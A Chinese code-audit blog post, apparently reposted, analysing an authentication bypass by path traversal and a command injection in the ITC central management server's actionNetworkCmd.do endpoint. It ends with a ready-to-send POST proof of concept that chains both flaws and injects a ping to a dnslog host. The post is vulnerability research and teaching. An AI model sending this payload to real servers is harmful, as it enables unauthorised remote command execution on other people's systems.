文章总结： 文章剖析ITC中心管理服务器：先利用web.xml白名单与路径穿越绕过AuthInterceptor，再在SystemController的actionNetworkCmd.do接口将ip参数直接拼入系统命令，给出完整POST利用链可回显执行任意命令，建议厂商修复路径校验并采用参数化调用。 综合评分： 82 文章分类： 代码审计,漏洞分析,WEB安全,渗透测试,漏洞POC

[跟着静师傅学代码审计]itc中心管理服务器审计

原创

静师傅 静师傅

安静安全

2026年1月26日 16:49 广东

点击上方「蓝字」，关注我们

“竹子太直吹大风马上就会被折断，但小草不管刮多大的风都会重新立起来。 ”

01

命令执行漏洞

首先我们需要先分析权限校验。

查看web.xml可以看到有几处过滤器。

这里可以看看XSS的过滤器。

跟进XssRequestWrapper。

在stripXSSAndSql方法中主要是对XSS常用标签进行过滤。

回到web.xml继续分析其他的过滤器。

静态资源过滤器包含.do文件。

跟进StaticResourcesFilter查看。

只是设置相关的响应返回头就放行了。

回到web.xml分析SpringMvc的内容。

跟进spring-servlet.xml文件查看。

权限认证在36行的AuthInterceptor类。

位于代码12行存在白名单文件,若包含:

{“Login.do”, “Main.do”, “Error.do”, “App.do”, “Jump.do”, “/sdk/”, “/manage/”, “/live/”, “join.do”, “/webVideo/”}则不会进行302跳转进入/frame/viewJump.do进行权限校验，可见和天锐绿盘存在相同的权限绕过问题，绕过payload如下:

/server/Main.do/../后台文件.do

命令执行漏洞位于actionNetworkCmd.do中。

定位控制器位于\webapps\cms\WEB-INF\classes\com\controller\SystemController.java。

位于代码334行,路由为/actionNetworkCmd，接收3个参数，分别为type、ip、time。

346行代码参数ip被直接拼接形成命令执行漏洞。

在system.js前端文件36行处完整接口路径是/system/actionNetworkCmd.do。

配合权限绕过POC如下:

POST /system/Main.do/../actionNetworkCmd.do HTTP/1.1Host: IP:PORTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0Accept: */*Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closePriority: u=0
type=0&ip=127.0.0.1;ping jqvs4b.dnslog.cn&time=5&port=

往期文章推荐

[跟着静师傅学代码审计-全网首发]用友U9 V6.6企业版多组织企业互联网应用平台命令执行+SQL+反序列化

[跟着静师傅学代码审计]九垠赢商业管理系统0day-文件上传和任意文件下载

[零日全网首发!]腾达路由器命令注入

交流群：安静安全

扫码关注 了解更多

点个「在看」，你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅 静师傅《[跟着静师傅学代码审计]itc中心管理服务器审计》